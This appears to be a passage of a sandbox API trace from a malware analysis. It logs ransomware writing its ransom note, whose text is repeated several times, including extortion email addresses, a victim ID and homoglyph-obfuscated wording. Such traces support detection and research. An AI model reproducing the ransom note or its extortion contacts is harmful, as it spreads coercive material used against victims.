BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nNFd5SUkifSx7ImNhbm9uaWN£\x0e", lpUsedDefaultChar=0x0) returned 8717 [0282.652] WriteFile (in: hFile=0x2cc, lpBuffer=0x1ef4b68*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef4b68*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0282.653] CloseHandle (hObject=0x2cc) returned 1 [0282.653] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\#readme_eman#.rtf")) returned 0xffffffff [0282.653] GetLastError () returned 0x2 [0282.653] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0282.653] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0282.654] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0282.654] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef4b68, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 